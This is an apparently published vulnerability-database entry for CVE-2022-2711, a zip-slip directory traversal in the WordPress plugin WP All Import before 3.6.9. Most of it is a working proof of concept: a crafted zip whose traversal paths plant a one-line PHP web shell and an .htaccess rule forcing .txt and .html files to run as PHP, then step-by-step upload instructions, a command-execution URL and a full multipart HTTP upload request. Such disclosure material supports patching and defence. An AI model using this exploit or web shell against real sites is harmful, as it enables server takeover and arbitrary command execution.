Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitLucyWPEX-ID:11E73C23-FF5F-42E5-A4B0-0971652DCEA1
HistoryOct 14, 2022 - 12:00 a.m.

WP All Import < 3.6.9 - Admin+ Directory traversal via file upload

2022-10-1400:00:00
lucy
72
wordpress
all import
vulnerability
directory traversal
file upload
security
exploit
command execution

0.001 Low

EPSS

Percentile

35.8%

JSON

The plugin is not validating the paths of files contained in uploaded zip archives, allowing highly privileged users, such as admins, to write arbitrary files to any part of the file system accessible by the web server via a path traversal vector.

[1] Download 'poc.zip' via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip'

 poc.zip contains 2 files like below
 -> '../../../../../../../../../../var/www/html/exploit.php.txt'
 -> '../../../../../../../../var/www/html/.htaccess'

 [1-1] '../../../../../../../../../../var/www/html/exploit.php.txt' is as follows.
 ----------------------------------
 <?php system($_GET['cmd']); ?>
 ----------------------------------

 [1-2] '../../../../../../../../var/www/html/.htaccess' is as follows.
 ----------------------------------
 <IfModule mod_rewrite.c>
 [same as the existing .htaccess data]
 AddHandler application/x-httpd-php .php .html
 </IfModule>
 ----------------------------------

[2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import'

[3] Access 'http://localhost/exploit.php.txt?cmd=id' in order to execute arbitrary commands.


[+++] PoC Request Packet Sample
POST /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=afb6fb6e5c HTTP/1.1
Host: localhost
Content-Length: 1333
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu
Accept: */*
Origin: http://localhost
Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [wordpress-admin-cookie]
Connection: close

------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="name"

poc.zip
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunk"

0
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="chunks"

1
------WebKitFormBoundaryrhApgY7BhUu88AGu
Content-Disposition: form-data; name="async-upload"; filename="poc.zip"
Content-Type: application/zip

[poc.zip payload]
[ - you can download it via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip']
------WebKitFormBoundaryrhApgY7BhUu88AGu--

Related

cve 1
nvd 1
prion 1
cvelist 1
wpvulndb 1
openvas 1
cve
cve
CVE-2022-2711
2022-11-07 10:15:11
nvd
nvd
CVE-2022-2711
2022-11-07 10:15:11
prion
prion
Path traversal
2022-11-07 10:15:00
cvelist
cvelist
CVE-2022-2711 WP All Import < 3.6.9 - Admin+ Directory traversal via file upload
2022-11-07 00:00:00
wpvulndb
wpvulndb
WP All Import < 3.6.9 - Admin+ Directory traversal via file upload
2022-10-14 00:00:00
openvas
openvas
WordPress Import any XML or CSV File to WordPress Plugin < 3.6.9 Multiple File Upload Vulnerabilities
2022-11-08 00:00:00

0.001 Low

EPSS

Percentile

35.8%

JSON
Related for WPEX-ID:11E73C23-FF5F-42E5-A4B0-0971652DCEA1
cve1nvd1prion1cvelist1wpvulndb1openvas1